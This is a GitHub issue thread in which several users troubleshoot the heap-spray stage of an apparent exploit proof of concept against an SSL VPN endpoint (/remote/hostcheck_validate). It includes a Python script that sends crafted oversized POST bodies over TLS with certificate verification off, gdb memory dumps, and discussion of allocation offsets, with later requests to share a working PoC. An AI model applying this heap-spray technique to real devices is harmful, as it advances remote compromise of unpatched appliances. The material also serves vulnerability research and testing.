
My heapspray has never been successful. I don't know if there is something wrong with the way I send packages. #4

Open
AshLQ opened this issue Mar 24, 2024 · 8 comments

Comments

@AshLQ

AshLQ commented Mar 24, 2024

```python
import socket
import ssl

# TLS client context with certificate verification disabled (as in the original post)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE

def send_req(req):
    try:
        s = socket.create_connection(host, timeout=20)
    except OSError:
        return -1
    ss = context.wrap_socket(s)
    ss.sendall(req)

# host (a (hostname, port) tuple) and form_value are defined elsewhere in the poster's script
body = (b"B" * 1808 + b"=" + form_value + b"&") * 20
data = b"POST /remote/hostcheck_validate HTTP/1.1\r\n"
data += b"Host: 192.168.81.100\r\n"
data += f"Content-Length: {len(body)}\r\n".encode("utf-8")
data += b"\r\n"
data += body
print('heap spray')
send_req(data)
```

```
(remote) gef➤ x/100gx 0x00007fc6897c0a0d
0x7fc6897c0a0d: 0xc6897c0ec800007f 0xc6898b6c3000007f
0x7fc6897c0a1d: 0xc6898b6c4000007f 0x000000000000007f
0x7fc6897c0a2d: 0xc6898b6c18000000 0xc6898b6c1e00007f
0x7fc6897c0a3d: 0x000000000000007f 0x0000000000000000
0x7fc6897c0a4d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0a5d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0a6d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0a7d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0a8d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0a9d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0aad: 0x0000000000000000 0x0000000000000000
0x7fc6897c0abd: 0x0000000000000000 0x0000000000000000
0x7fc6897c0acd: 0x0000000000000000 0x0000000000000000
0x7fc6897c0add: 0x0000000000000000 0x0000000000000000
0x7fc6897c0aed: 0x0000000000000000 0x0000000000000000
0x7fc6897c0afd: 0x0000000000000000 0x0000000000000000
0x7fc6897c0b0d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0b1d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0b2d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0b3d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0b4d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0b5d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0b6d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0b7d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0b8d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0b9d: 0x0000000000000000 0x0000000000000000
0x7fc6897c0bad: 0x0000000000000000 0x0000000000000000
```

@CinnaTech

I got the same results with the heap spray. Can’t seem to get a response from the user though.

@AshLQ

AshLQ commented Mar 25, 2024

> I got the same results with the heap spray. It seems impossible to get a response from the user.

Yes, I tested it today and it didn't effectively result in a heap spray. I only managed to heap spray xxxx0a0d to overwrite it with 0x42424242 once, but the offsets in it were still wrong.

@AshLQ

AshLQ commented Mar 25, 2024

It's still not working. I may need to change the way I send out packages.

```
(remote) gef➤ x/20gx 0x00007f84c7c50a0d
0x7f84c7c50a0d: 0x84c7ca478000007f 0x000000000000007f
0x7f84c7c50a1d: 0x0624306830000000 0x3007050501062b08
0x7f84c7c50a2d: 0x3a70747468188601 0x642e7073636f2f2f
0x7f84c7c50a3d: 0x2e74726563696769 0x2b080640306d6f63
0x7f84c7c50a4d: 0x8602300705050106 0x2f2f3a7074746834
0x7f84c7c50a5d: 0x2e73747265636163 0x7472656369676964
0x7f84c7c50a6d: 0x6769442f6d6f632e 0x6f6c477472654369
0x7f84c7c50a7d: 0x43746f6f526c6162 0x0000007472632e41
0x7f84c7c50a8d: 0x0000000180000000 0x84c7cf4990000000
0x7f84c7c50a9d: 0x060000000600007f 0x0000000000000000
```

@CinnaTech

In the Assetnote blog I noticed that in gdb the first request was made with calloc, but mine shows malloc. I have tested with Golang and the result is the same. Something is questionable about that PoC; maybe another blog explains it.

@CinnaTech

Did you manage the heap spray?

@splashsc

Hi, thank you for sharing, have you solved it? I also encountered the same problem

@AshLQ

AshLQ commented May 15, 2024

> Hi, thank you for sharing, have you solved it? I also encountered the same problem

Yes, it's been resolved.

@heather-wyman

Hey @AshLQ, I'm running into a similar issue trying to test this on 7.4.2. Would you be able to share how you got the PoC working? It would be much appreciated.
